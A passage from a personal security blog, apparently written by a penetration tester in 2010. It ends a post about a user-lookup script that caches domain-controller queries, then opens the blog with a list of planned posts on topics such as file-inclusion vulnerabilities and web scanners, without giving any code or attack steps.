This is probably version 5 or 6 at this point. I've made adjustments to add data, and added the dictionary objects so that it can keep track of the users it's already looked up. While this adds to the memory requirements of the script, it causes a huge increase in the speed with which it runs, because it is not making repeat queries to the DC.

P.S. Also note that the script directly calls Excel to handle it's parsing, so it will not work if MS Excel is not installed on the machine. You could very easily write something like this in Perl that did all the parsing itself, but at the time, I was constrained by the environment I was working in. Enjoy

Oh no, another Security Blog!

2010-02-23T12:57:00.000-08:00

Yes, it's true. I have created another security blog, to add my voice to the screaming masses of wannabe-pontiffs in the Web 2.0 Universe. Will anyone read this, probably not, but I hope that perhaps somebody will stumble across this and take an interest in the things I have to say.

Why you should listen to me: you probably shouldn't, but I am an Information Security professional who specializes in vulnerability assessment and penetration testing. I will be using this blog as an outlet for my observations on Information Security, techniques and tricks I have learned, and general ramblings abound.

Stay tuned for some of the following planned postings:

TLC vs the Google Mini 2 - Cracking the Case and installing Debian on a Google Mini Search appliance.
Lipstick on a Pig - Why I am not impressed by your "Web Vulnerability Scanner"
A Tenable Position - Why Nessus could easily be enough
I don't know why you say 403, I say 200 - How always returning a 200 OK server response for login requests can defeat skiddie bruteforcers
Knocking over the LAMP Part I (LFI) - Part I of a look at web vulnerabilities specifically dealing with Linux Apache,MySql, and PHP servers. Part I looks at how Local File inclusion can turn from data leakage to remote execute in just a few minutes.
Get outta my Face...book - Why Social Networking Sites may be one of the worst things to ever happen to the Internet

I had one or two more I had already considered writing, but I unfortunately didn't write them down....< /irony>